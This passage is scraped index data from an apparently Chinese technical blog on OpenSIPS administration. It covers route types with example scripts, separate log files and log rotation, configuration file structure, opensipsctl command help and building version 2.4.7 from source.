某个函数可以支持6个参数,全部都是的可选的,但是我只想传第一个和第6个,应该怎么传?\n不想传参的话,需要使用逗号隔开\nsiprec_start_recording(srs,,,,,media_ip) ","title":"函数特点"},{"content":"opensips路由分为两类,主路由和子路由。主路由被opensips调用,子路由在主路由中被调用。可以理解子路由是一种函数。\n所有路由中不允许出现无任何语句的情况,否则将会导致opensips无法正常启动,例如下面\nroute[some_xxx]{ } 主路由分为几类\n请求路由 分支路由 失败路由 响应路由 本地路由 启动路由 定时器路由 事件路由 错误路由 inspect:查看sip消息内容 modifies: 修改sip消息内容,例如修改request url drop: 丢弃sip请求 forking: 可以理解为发起一个invite, 然后可以拨打多个人 signaling: 信令层的操作,例如返回200ok之类的\n路由 是否必须 默认行为 可以做 不可以做 触发方向 触发次数 请求路由 是 drop inspect,modifies, drop, signaling incoming, inbound 分支路由 否 send out forking, modifies, drop, inspect relaying, replying,signaling outbound, outgoing, branch frok 一个请求/事务一次 失败路由 否 将错误返回给产生者 signaling,replying, inspect incoming 一个请求/事务一次 响应路由 否 relay back inspect, modifies signaling incoming, inbound 一个请求/事务一次 本地路由 否 send out signaling outbound 本地路由只能有一个 剩下的启动路由,定时器路由,事件路由,错误路由只能用来做和sip消息无关的事情。\n请求路由 请求路由因为受到从外部网络来的请求而触发。\n# 主路由 route { ...... if (is_method(\u0026#34;INVITE\u0026#34;)) { route(check_hdrs,1); # 调用子路由check_hdrs,1是传递给子路由的参数 if ($rc\u0026lt;0) # 使用$rc获取上个子路由的处理结果 exit; } } # sub-route route[check_hdrs] { if (!is_present_hf(\u0026#34;Content-Type\u0026#34;)) return(-1); if ( $param(1)==1 \u0026amp;\u0026amp; !has_body() ) # 子路由使用$param(1), 获取传递的第一个参数 return(-2); # 使用return() 返回子路由的处理结果 return(1); } $rc和$retcode都可以获取子路由的返回结果。\n请求路由是必须的一个路由,所有从网络过来的请求,都会经过请求路由。\n在请求路由中,可以做三个动作\n给出响应 向前传递 丢弃这个请求 注意事项:\nrequest路由被到达的sip请求触发 默认的动作是丢弃这个请求 分支路由 注意事项:\nrequest路由被到达的sip请求触发 默认的动作是发出这个请求 t_on_branch并不是立即执行分支路由,而是注册分支路由的处理事件 注意所有**t_on_**开头的函数都是注册钩子,而不是立即执行。注册钩子可以理解为不是现在执行,而是未来某个时间会被触发执行。 分支路由只能用来触发一次,多次触发将会重写 你可以在这个路由中修改sip request url, 但是不能执行reply等信令方面的操作 route{ ... t_on_branch(\u0026#34;nat_filter\u0026#34;) ... } branch_route[nat_filter]{ } 失败的路由 当收到大于等于300的响应时触发失败路由 route{ ... t_on_failure(\u0026#34;vm_redirect\u0026#34;) ... } failure_route[vm_redirects]{ } 响应路由 当收到响应时触发,包括1xx-6xx的所有响应。\n响应路由分为两类\n全局响应路由,即不带名称的onreply_route{}, 自动触发,在带名响应路由前执行。 带名称的响应路由,即onreplay_route[some_name]{},需要用t_on_reply()方法来设置触发。 route{ t_on_reply(\u0026#34;inspect_reply\u0026#34;); } onreply_route{ xlog(\u0026#34;$rm/$rs/$si/$ci: global onreply route\u0026#34;); } onreply_route[inspect_reply]{ if ( t_check_status(\u0026#34;1[0-9][0-9]\u0026#34;) ) { xlog(\u0026#34;provisional reply $T_reply_code received\\n\u0026#34;); } if ( t_check_status(\u0026#34;2[0-9][0-9]\u0026#34;) ) { xlog(\u0026#34;successful reply $T_reply_code received\\n\u0026#34;); remove_hf(\u0026#34;User-Agent\u0026#34;); } else { xlog(\u0026#34;non-2xx reply $T_reply_code received\\n\u0026#34;); } } 本地路由 有些请求是opensips自己发的,这时候触发本地路由。使用场景:在多人会议时,opensips可以给多人发送bye消息。\nlocal_route { } 启动路由 可以让你在opensips启动时做些初始化操作\n注意启动路由里面一定要有语句,哪怕是写个xlog(\u0026ldquo;hello\u0026rdquo;), 否则opensips将会无法启动。\nstartup_route { } 计时器路由 在指定的周期,触发路由。可以用来更新本地缓存。\n注意计时器路由里面一定要有语句,哪怕是写个xlog(\u0026ldquo;hello\u0026rdquo;), 否则opensips将会无法启动。\n如:每隔120秒,做个事情\ntimer_route[gw_update, 120] { # update the local cache if signalized if ($shv(reload) == 1 ) { avp_db_query(\u0026#34;select gwlist from routing where id=10\u0026#34;, \u0026#34;$avp(list)\u0026#34;); cache_store(\u0026#34;local\u0026#34;,\u0026#34;gwlist10\u0026#34;,\u0026#34; $avp(list)\u0026#34;); } } 事件路由 当收到某些事件是触发,例如日志,数据库操作,数据更新,某些\n在事件路由的内部,可以使用$param(key)的方式获取事件的某些属性。\nxlog(\u0026#34;first parameters is $param(1)\\n\u0026#34;); # 根据序号 xlog(\u0026#34;Pike Blocking IP is $param(ip)\\n\u0026#34;); # 根据key event_route[E_DISPATCHER_STATUS] { } event_route[E_PIKE_BLOCKED] { xlog(\u0026#34;IP $param(ip) has been blocked\\n\u0026#34;); } 更多可以参考: https://opensips.org/html/docs/modules/devel/event_route.html\n错误路由 用来捕获运行时错误,例如解析sip消息出错。\nerror_route { xlog(\u0026#34;$rm from $si:$sp - error level=$(err.level), info=$(err.info)\\n\u0026#34;); sl_send_reply(\u0026#34;$err.rcode\u0026#34;, \u0026#34;$err.rreason\u0026#34;); exit; } ","permalink":"https://wdd.js.org/opensips/ch5/routing-type/","summary":"opensips路由分为两类,主路由和子路由。主路由被opensips调用,子路由在主路由中被调用。可以理解子路由是一种函数。\n所有路由中不允许出现无任何语句的情况,否则将会导致opensips无法正常启动,例如下面\nroute[some_xxx]{ } 主路由分为几类\n请求路由 分支路由 失败路由 响应路由 本地路由 启动路由 定时器路由 事件路由 错误路由 inspect:查看sip消息内容 modifies: 修改sip消息内容,例如修改request url drop: 丢弃sip请求 forking: 可以理解为发起一个invite, 然后可以拨打多个人 signaling: 信令层的操作,例如返回200ok之类的\n路由 是否必须 默认行为 可以做 不可以做 触发方向 触发次数 请求路由 是 drop inspect,modifies, drop, signaling incoming, inbound 分支路由 否 send out forking, modifies, drop, inspect relaying, replying,signaling outbound, outgoing, branch frok 一个请求/事务一次 失败路由 否 将错误返回给产生者 signaling,replying, inspect incoming 一个请求/事务一次 响应路由 否 relay back inspect, modifies signaling incoming, inbound 一个请求/事务一次 本地路由 否 send out signaling outbound 本地路由只能有一个 剩下的启动路由,定时器路由,事件路由,错误路由只能用来做和sip消息无关的事情。","title":"路由分类"},{"content":"设置独立日志 默认情况下,opensips的日志会写在系统日志文件/var/log/message中,为了避免难以查阅日志,我们可以将opensips的日志写到单独的日志文件中。\n环境说明\ndebian buster\n这个需要做两步。\n第一步,配置opensips.cfg文件\nlog_facility=LOG_LOCAL0 第二步, 创建日志配置文件\necho \u0026#34;local0.* -/var/log/opensips.log\u0026#34; \u0026gt; /etc/rsyslog.d/opensips.conf 第三步,创建日志文件\ntouch /var/log/opensips.log 第四步,重启rsyslog和opensips\nservice rsyslog restart opensipsctl restart 第五步,验证结果\ntail /var/log/opensips.log 日志回滚 为了避免日志文件占用过多磁盘空间,需要做日志回滚。\n安装logrotate apt install logrotate -y 日志回滚配置文件 /etc/logrotate.d/opensips\n/var/log/opensips.log { noolddir size 10M rotate 100 copytruncate compress sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 配置定时任务\n*/10 * * * * /usr/sbin/logrotate /etc/logrotate.d/opensips ","permalink":"https://wdd.js.org/opensips/ch3/log/","summary":"设置独立日志 默认情况下,opensips的日志会写在系统日志文件/var/log/message中,为了避免难以查阅日志,我们可以将opensips的日志写到单独的日志文件中。\n环境说明\ndebian buster\n这个需要做两步。\n第一步,配置opensips.cfg文件\nlog_facility=LOG_LOCAL0 第二步, 创建日志配置文件\necho \u0026#34;local0.* -/var/log/opensips.log\u0026#34; \u0026gt; /etc/rsyslog.d/opensips.conf 第三步,创建日志文件\ntouch /var/log/opensips.log 第四步,重启rsyslog和opensips\nservice rsyslog restart opensipsctl restart 第五步,验证结果\ntail /var/log/opensips.log 日志回滚 为了避免日志文件占用过多磁盘空间,需要做日志回滚。\n安装logrotate apt install logrotate -y 日志回滚配置文件 /etc/logrotate.d/opensips\n/var/log/opensips.log { noolddir size 10M rotate 100 copytruncate compress sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 配置定时任务","title":"设置独立日志文件"},{"content":"脚本预处理 如果你的opensips.cfg文件不大,可以写成一个文件。否则建议使用include_file引入配置文件。\ninclude_file \u0026#34;global.cfg\u0026#34; 有些配置,建议使用m4宏处理。\n脚本结构 ####### Global Parameters ######### debug=3 log_stderror=no fork=yes children=4 listen=udp:127.0.0.1:5060 ####### Modules Section ######## mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; loadmodule \u0026#34;sipmsgops.so\u0026#34; modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) ####### Routing Logic ######## route{ if ( has_totag() ) { loose_route(); route(relay); } if ( from_uri!=myself \u0026amp;\u0026amp; uri!=myself ) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } record_route(); route(relay); } route[relay] { if (is_method(\u0026#34;INVITE\u0026#34;)) t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; } failure_route[missed_call] { if (t_check_status(\u0026#34;486\u0026#34;)) { $rd = \u0026#34;127.0.0.10\u0026#34;; t_relay(); } } 脚本一般由三个部分组成:\n全局参数配置 模块加载与参数配置 路由逻辑 全局参数配置 debug=2 # log level 2 (NOTICE) debug值越大,日志越详细 log_stderror=0 #log to syslog log_facility=LOG_LOCAL0 log_name=\u0026#34;sbc\u0026#34; listen=udp:127.0.0.1:5060 listen=tcp:192.168.1.5:5060 as 10.10.1.10:5060 listen=tls:192.168.1.5:5061 advertised_address=7.7.7.7 #global option, for all listeners 模块加载与参数配置 按照绝对路径加载模块\nloadmodules \u0026#34;/lib/opensips/modules/rr.so\u0026#34; loadmodules \u0026#34;/lib/opensips/modules/tm.so\u0026#34; 统一前缀加载模块\nmpath=\u0026#34;/lib/opensips/modules/\u0026#34; loadmodules \u0026#34;rr.so\u0026#34; loadmodules \u0026#34;tm.so\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch5/routing-script/","summary":"脚本预处理 如果你的opensips.cfg文件不大,可以写成一个文件。否则建议使用include_file引入配置文件。\ninclude_file \u0026#34;global.cfg\u0026#34; 有些配置,建议使用m4宏处理。\n脚本结构 ####### Global Parameters ######### debug=3 log_stderror=no fork=yes children=4 listen=udp:127.0.0.1:5060 ####### Modules Section ######## mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; loadmodule \u0026#34;sipmsgops.so\u0026#34; modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) ####### Routing Logic ######## route{ if ( has_totag() ) { loose_route(); route(relay); } if ( from_uri!=myself \u0026amp;\u0026amp; uri!=myself ) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } record_route(); route(relay); } route[relay] { if (is_method(\u0026#34;INVITE\u0026#34;)) t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; } failure_route[missed_call] { if (t_check_status(\u0026#34;486\u0026#34;)) { $rd = \u0026#34;127.","title":"配置文件"},{"content":"可以使用一下命令查找opensips的相关文件夹\nfind / -name opensips -type d 一般来说,重要的是opensips.cfg文件,这个文件一般位于/usr/local/etc/opensips/或者/usr/etc/opensips中。主要还是要看安装时选择的默认路径。\n其中1.x版本的配置文件一般位于/usr/etc/opensips目录中,2.x版本的配置一般位于/usr/local/etc/opensips目录中。\n下面主要讲解几个命令。\n配置文件校验 校验opensips.cfg脚本是否合法, 如果有问题,会提示那行代码有问题,但是报错位置好像一直不准确。很多时候可能是忘记写分好了。\nopensips -C opensips.cfg 启动关闭与重启 使用opensipsctl命令做数据库操作前,需要先配置opensipsctlrc文件\nopensips start|stop|restart opensipsctl start|stop|restart 资源创建 opensipsdbctl create # 创建数据库 opensipsctl domain add abc.cc #创建域名 opensipsctl add 1001@test.cc 12346 # 新增用户 opensipsctl rm 1001@test.cc # 删除用户 opensipsctl passwdd 1001@test.cc 09879 # 修改密码 opensipsctl -h 显示所有可用命令\n/usr/local/sbin/opensipsctl $Revision: 4448 $ Existing commands: -- command \u0026#39;start|stop|restart|trap\u0026#39; trap ............................... trap with gdb OpenSIPS processes restart ............................ restart OpenSIPS start .............................. start OpenSIPS stop ............................... stop OpenSIPS -- command \u0026#39;acl\u0026#39; - manage access control lists (acl) acl show [\u0026lt;username\u0026gt;] .............. show user membership acl grant \u0026lt;username\u0026gt; \u0026lt;group\u0026gt; ....... grant user membership (*) acl revoke \u0026lt;username\u0026gt; [\u0026lt;group\u0026gt;] .... grant user membership(s) (*) -- command \u0026#39;cr\u0026#39; - manage carrierroute tables cr show ....................................................... show tables cr reload ..................................................... reload tables cr dump ....................................................... show in memory tables cr addrt \u0026lt;routing_tree_id\u0026gt; \u0026lt;routing_tree\u0026gt; ..................... add a tree cr rmrt \u0026lt;routing_tree\u0026gt; ....................................... rm a tree cr addcarrier \u0026lt;carrier\u0026gt; \u0026lt;scan_prefix\u0026gt; \u0026lt;domain\u0026gt; \u0026lt;rewrite_host\u0026gt; ................ \u0026lt;prob\u0026gt; \u0026lt;strip\u0026gt; \u0026lt;rewrite_prefix\u0026gt; \u0026lt;rewrite_suffix\u0026gt; ............... \u0026lt;flags\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;comment\u0026gt; .........................add a carrier (prob, strip, rewrite_prefix, rewrite_suffix,................... flags, mask and comment are optional arguments) ............... cr rmcarrier \u0026lt;carrier\u0026gt; \u0026lt;scan_prefix\u0026gt; \u0026lt;domain\u0026gt; ................ rm a carrier -- command \u0026#39;rpid\u0026#39; - manage Remote-Party-ID (RPID) rpid add \u0026lt;username\u0026gt; \u0026lt;rpid\u0026gt; ......... add rpid for a user (*) rpid rm \u0026lt;username\u0026gt; ................. set rpid to NULL for a user (*) rpid show \u0026lt;username\u0026gt; ............... show rpid of a user -- command \u0026#39;add|passwd|rm\u0026#39; - manage subscribers add \u0026lt;username\u0026gt; \u0026lt;password\u0026gt; .......... add a new subscriber (*) passwd \u0026lt;username\u0026gt; \u0026lt;passwd\u0026gt; ......... change user\u0026#39;s password (*) rm \u0026lt;username\u0026gt; ...................... delete a user (*) -- command \u0026#39;add|dump|reload|rm|show\u0026#39; - manage address address show ...................... show db content address dump ...................... show cache content address reload .................... reload db table into cache address add \u0026lt;grp\u0026gt; \u0026lt;ip\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;port\u0026gt; \u0026lt;proto\u0026gt; [\u0026lt;context_info\u0026gt;] [\u0026lt;pattern\u0026gt;] ....................... add a new entry ....................... (from_pattern and tag are optional arguments) address rm \u0026lt;grp\u0026gt; \u0026lt;ip\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;port\u0026gt; ............... remove all entries ....................... for the given grp ip mask port -- command \u0026#39;dr\u0026#39; - manage dynamic routing * Examples: dr addgw \u0026#39;1\u0026#39; 10 \u0026#39;192.168.2.2\u0026#39; 0 \u0026#39;\u0026#39; \u0026#39;GW001\u0026#39; 0 \u0026#39;first_gw\u0026#39; * dr addgw \u0026#39;2\u0026#39; 20 \u0026#39;192.168.2.3\u0026#39; 0 \u0026#39;\u0026#39; \u0026#39;GW002\u0026#39; 0 \u0026#39;second_gw\u0026#39; * dr rmgw 2 * dr addgrp \u0026#39;alice\u0026#39; \u0026#39;example.com\u0026#39; 10 \u0026#39;first group\u0026#39; * dr rmgrp 1 * dr addcr \u0026#39;cr_1\u0026#39; \u0026#39;10\u0026#39; 0 \u0026#39;CARRIER_1\u0026#39; \u0026#39;first_carrier\u0026#39; * dr rmcr 1 * dr addrule \u0026#39;10,20\u0026#39; \u0026#39;+1\u0026#39; \u0026#39;20040101T083000\u0026#39; 0 0 \u0026#39;1,2\u0026#39; \u0026#39;NA_RULE\u0026#39; \u0026#39;NA routing\u0026#39; * dr rmrule 1 dr show ............................ show dr tables dr addgw \u0026lt;gwid\u0026gt; \u0026lt;type\u0026gt; \u0026lt;address\u0026gt; \u0026lt;strip\u0026gt; \u0026lt;pri_prefix\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;probe_mode\u0026gt; \u0026lt;description\u0026gt; ................................. add gateway dr rmgw \u0026lt;id\u0026gt; ....................... delete gateway dr addgrp \u0026lt;username\u0026gt; \u0026lt;domain\u0026gt; \u0026lt;groupid\u0026gt; \u0026lt;description\u0026gt; ................................. add gateway group dr rmgrp \u0026lt;id\u0026gt; ...................... delete gateway group dr addcr \u0026lt;carrierid\u0026gt; \u0026lt;gwlist\u0026gt; \u0026lt;flags\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;description\u0026gt; ........................... add carrier dr rmcr \u0026lt;id\u0026gt; ....................... delete carrier dr addrule \u0026lt;groupid\u0026gt; \u0026lt;prefix\u0026gt; \u0026lt;timerec\u0026gt; \u0026lt;priority\u0026gt; \u0026lt;routeid\u0026gt; \u0026lt;gwlist\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;description\u0026gt; ................................. add rule dr rmrule \u0026lt;ruleid\u0026gt; ................. delete rule dr reload .......................... reload dr tables dr gw_status ....................... show gateway status dr carrier_status .................. show carrier status -- command \u0026#39;dispatcher\u0026#39; - manage dispatcher * Examples: dispatcher addgw 1 sip:1.2.3.1:5050 \u0026#39;\u0026#39; 0 50 \u0026#39;og1\u0026#39; \u0026#39;Outbound Gateway1\u0026#39; * dispatcher addgw 2 sip:1.2.3.4:5050 \u0026#39;\u0026#39; 0 50 \u0026#39;og2\u0026#39; \u0026#39;Outbound Gateway2\u0026#39; * dispatcher rmgw 4 dispatcher show ..................... show dispatcher gateways dispatcher reload ................... reload dispatcher gateways dispatcher dump ..................... show in memory dispatcher gateways dispatcher addgw \u0026lt;setid\u0026gt; \u0026lt;destination\u0026gt; \u0026lt;socket\u0026gt; \u0026lt;state\u0026gt; \u0026lt;weight\u0026gt; \u0026lt;attrs\u0026gt; [description] .......................... add gateway dispatcher rmgw \u0026lt;id\u0026gt; ................ delete gateway -- command \u0026#39;registrant\u0026#39; - manage registrants * Examples: registrant add sip:opensips.org \u0026#39;\u0026#39; sip:user@opensips.org \u0026#39;\u0026#39; user password sip:user@localhost \u0026#39;\u0026#39; 3600 \u0026#39;\u0026#39; registrant show ......................... show registrant table registrant dump ......................... show registrant status registrant add \u0026lt;registrar\u0026gt; \u0026lt;proxy\u0026gt; \u0026lt;aor\u0026gt; \u0026lt;third_party_registrant\u0026gt; \u0026lt;username\u0026gt; \u0026lt;password\u0026gt; \u0026lt;binding_URI\u0026gt; \u0026lt;binding_params\u0026gt; \u0026lt;expiry\u0026gt; \u0026lt;forced_socket\u0026gt; . add a registrant registrant rm ........................... removes the entire registrant table registrant rmaor \u0026lt;id\u0026gt; ................... removes the gived aor id -- command \u0026#39;db\u0026#39; - database operations db exec \u0026lt;query\u0026gt; ..................... execute SQL query db roexec \u0026lt;roquery\u0026gt; ................. execute read-only SQL query db run \u0026lt;id\u0026gt; ......................... execute SQL query from $id variable db rorun \u0026lt;id\u0026gt; ....................... execute read-only SQL query from $id variable db show \u0026lt;table\u0026gt; ..................... display table content -- command \u0026#39;speeddial\u0026#39; - manage speed dials (short numbers) speeddial show \u0026lt;speeddial-id\u0026gt; ....... show speeddial details speeddial list \u0026lt;sip-id\u0026gt; ............. list speeddial for uri speeddial add \u0026lt;sip-id\u0026gt; \u0026lt;sd-id\u0026gt; \u0026lt;new-uri\u0026gt; [\u0026lt;desc\u0026gt;] ... ........................... add a speedial (*) speeddial rm \u0026lt;sip-id\u0026gt; \u0026lt;sd-id\u0026gt; ....... remove a speeddial (*) speeddial help ...................... help message - \u0026lt;speeddial-id\u0026gt;, \u0026lt;sd-id\u0026gt; must be an AoR (username@domain) - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain) - \u0026lt;new-uri\u0026gt; must be a SIP AoR (sip:username@domain) - \u0026lt;desc\u0026gt; a description for speeddial -- command \u0026#39;avp\u0026#39; - manage AVPs avp list [-T table] [-u \u0026lt;sip-id|uuid\u0026gt;] [-a attribute] [-v value] [-t type] ... list AVPs avp add [-T table] \u0026lt;sip-id|uuid\u0026gt; \u0026lt;attribute\u0026gt; \u0026lt;type\u0026gt; \u0026lt;value\u0026gt; ............ add AVP (*) avp rm [-T table] [-u \u0026lt;sip-id|uuid\u0026gt;] [-a attribute] [-v value] [-t type] ... remove AVP (*) avp help .................................. help message - -T - table name - -u - SIP id or unique id - -a - AVP name - -v - AVP value - -t - AVP name and type (0 (str:str), 1 (str:int), 2 (int:str), 3 (int:int)) - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain) - \u0026lt;uuid\u0026gt; must be a string but not AoR -- command \u0026#39;alias_db\u0026#39; - manage database aliases alias_db show \u0026lt;alias\u0026gt; .............. show alias details alias_db list \u0026lt;sip-id\u0026gt; ............. list aliases for uri alias_db add \u0026lt;alias\u0026gt; \u0026lt;sip-id\u0026gt; ...... add an alias (*) alias_db rm \u0026lt;alias\u0026gt; ................ remove an alias (*) alias_db help ...................... help message - \u0026lt;alias\u0026gt; must be an AoR (username@domain)\u0026#34; - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain)\u0026#34; -- command \u0026#39;domain\u0026#39; - manage local domains domain reload ....................... reload domains from disk domain show ......................... show current domains in memory domain showdb ....................... show domains in the database domain add \u0026lt;domain\u0026gt; ................. add the domain to the database domain rm \u0026lt;domain\u0026gt; .................. delete the domain from the database -- command \u0026#39;cisco_restart\u0026#39; - restart CISCO phone (NOTIFY) cisco_restart \u0026lt;uri\u0026gt; ................ restart phone configured for \u0026lt;uri\u0026gt; -- command \u0026#39;online\u0026#39; - dump online users from memory online ............................. display online users -- command \u0026#39;monitor\u0026#39; - show internal status monitor ............................ show server\u0026#39;s internal status -- command \u0026#39;ping\u0026#39; - ping a SIP URI (OPTIONS) ping \u0026lt;uri\u0026gt; ......................... ping \u0026lt;uri\u0026gt; with SIP OPTIONS -- command \u0026#39;ul\u0026#39; - manage user location records ul show [\u0026lt;username\u0026gt;]................ show in-RAM online users ul show --brief..................... show in-RAM online users in short format ul rm \u0026lt;username\u0026gt; [\u0026lt;contact URI\u0026gt;].... delete user\u0026#39;s usrloc entries ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; ............ introduce a permanent usrloc entry ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; \u0026lt;expires\u0026gt; .. introduce a temporary usrloc entry -- command \u0026#39;fifo\u0026#39; fifo ............................... send raw FIFO command ➜ ~ opopensipsctl ul /bin/bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) ERROR: usrloc - too few parameters -- command \u0026#39;ul\u0026#39; - manage user location records ul show [\u0026lt;username\u0026gt;]................ show in-RAM online users ul show --brief..................... show in-RAM online users in short format ul rm \u0026lt;username\u0026gt; [\u0026lt;contact URI\u0026gt;].... delete user\u0026#39;s usrloc entries ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; ............ introduce a permanent usrloc entry ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; \u0026lt;expires\u0026gt; .. introduce a temporary usrloc entry opensips命令 opensips -h\n有时候,你用opensipsctl start 启动opensips时,你可能会想,opensips是从哪个目录读取opensips.cfg文件的,那你可以输入opensips -h。输出的结果,第一行就包括了默认的配置文件的位置。\n-f file Configuration file (default /usr/local//etc/opensips/opensips.cfg) -c Check configuration file for errors -C Similar to \u0026#39;-c\u0026#39; but in addition checks the flags of exported functions from included route blocks -l address Listen on the specified address/interface (multiple -l mean listening on more addresses). The address format is [proto:]addr[:port], where proto=udp|tcp and addr= host|ip_address|interface_name. E.g: -l locahost, -l udp:127.0.0.1:5080, -l eth0:5062 The default behavior is to listen on all the interfaces. -n processes Number of worker processes to fork per UDP interface (default: 8) -r Use dns to check if is necessary to add a \u0026#34;received=\u0026#34; field to a via -R Same as `-r` but use reverse dns; (to use both use `-rR`) -v Turn on \u0026#34;via:\u0026#34; host checking when forwarding replies -d Debugging mode (multiple -d increase the level) -D Run in debug mode -F Daemon mode, but leave main process foreground -E Log to stderr -N processes Number of TCP worker processes (default: equal to `-n`) -W method poll method -V Version number -h This help message -b nr Maximum receive buffer size which will not be exceeded by auto-probing procedure even if OS allows -m nr Size of shared memory allocated in Megabytes 默认32MB -M nr Size of pkg memory allocated in Megabytes 默认2MB -w dir Change the working directory to \u0026#34;dir\u0026#34; (default \u0026#34;/\u0026#34;) -t dir Chroot to \u0026#34;dir\u0026#34; -u uid Change uid -g gid Change gid -P file Create a pid file -G file Create a pgid file ","permalink":"https://wdd.js.org/opensips/ch3/opensipsctl/","summary":"可以使用一下命令查找opensips的相关文件夹\nfind / -name opensips -type d 一般来说,重要的是opensips.cfg文件,这个文件一般位于/usr/local/etc/opensips/或者/usr/etc/opensips中。主要还是要看安装时选择的默认路径。\n其中1.x版本的配置文件一般位于/usr/etc/opensips目录中,2.x版本的配置一般位于/usr/local/etc/opensips目录中。\n下面主要讲解几个命令。\n配置文件校验 校验opensips.cfg脚本是否合法, 如果有问题,会提示那行代码有问题,但是报错位置好像一直不准确。很多时候可能是忘记写分好了。\nopensips -C opensips.cfg 启动关闭与重启 使用opensipsctl命令做数据库操作前,需要先配置opensipsctlrc文件\nopensips start|stop|restart opensipsctl start|stop|restart 资源创建 opensipsdbctl create # 创建数据库 opensipsctl domain add abc.cc #创建域名 opensipsctl add 1001@test.cc 12346 # 新增用户 opensipsctl rm 1001@test.cc # 删除用户 opensipsctl passwdd 1001@test.cc 09879 # 修改密码 opensipsctl -h 显示所有可用命令\n/usr/local/sbin/opensipsctl $Revision: 4448 $ Existing commands: -- command \u0026#39;start|stop|restart|trap\u0026#39; trap ............................... trap with gdb OpenSIPS processes restart ............................ restart OpenSIPS start .","title":"opensips管理命令"},{"content":"1. 安装依赖 apt-get update -qq \u0026amp;\u0026amp; apt-get install -y build-essential net-tools \\ bison flex m4 pkg-config libncurses5-dev rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev wget lsof 2. 编译 下载opensips-2.4.7的源码,然后解压。\ninclude_moduls可以按需指定,你可以只写你需要的模块。\ncd /usr/local/src/opensips-2.4.7 make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; make install include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch3/install-opensips/","summary":"1. 安装依赖 apt-get update -qq \u0026amp;\u0026amp; apt-get install -y build-essential net-tools \\ bison flex m4 pkg-config libncurses5-dev rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev wget lsof 2. 编译 下载opensips-2.4.7的源码,然后解压。\ninclude_moduls可以按需指定,你可以只写你需要的模块。\ncd /usr/local/src/opensips-2.4.7 make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; make install include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; ","title":"debian jessie opensips 2.4.7 安装"},{"content":"如何学习网络协议? 大学时,学到网络协议的7层模型时,老师教了大家一个顺口溜:物数网传会表应。并说这是重点,年年必考,5分的题目摆在这里,你们爱背不背。 考试的时候,果然遇到这个问题,搜索枯肠,只能想到这7个字的第一个字,因为这5分,差点挂科。 后来工作面试,面试官也是很喜欢七层模型,三次握手之类的问题,但是遇到这些问题时,总是觉得很心虚。\n1. 协议分层 四层网络协议模型中,应用层以下一般都是交给操作系统来处理。应用层对于四层模型来说,仅仅是冰山一角。海面下巨复杂的三层协议,都被操作系统给隐藏起来了,一般我们在页面上发起一个ajax请求,看见了network面板多了一个http请求,至于底层是如何实现的,我们并不关心。\n应⽤层负责处理特定的应⽤程序细节。 运输层运输层主要为两台主机上的应⽤程序提供端到端的通信。 网络层处理理分组在⽹网络中的活动,例例如分组的选路 链路层处理理与电缆(或其他任何传输媒介)的物理理接⼝口细节 下面重点讲一下运输层和网络层\n1.1. 运输层的两兄弟 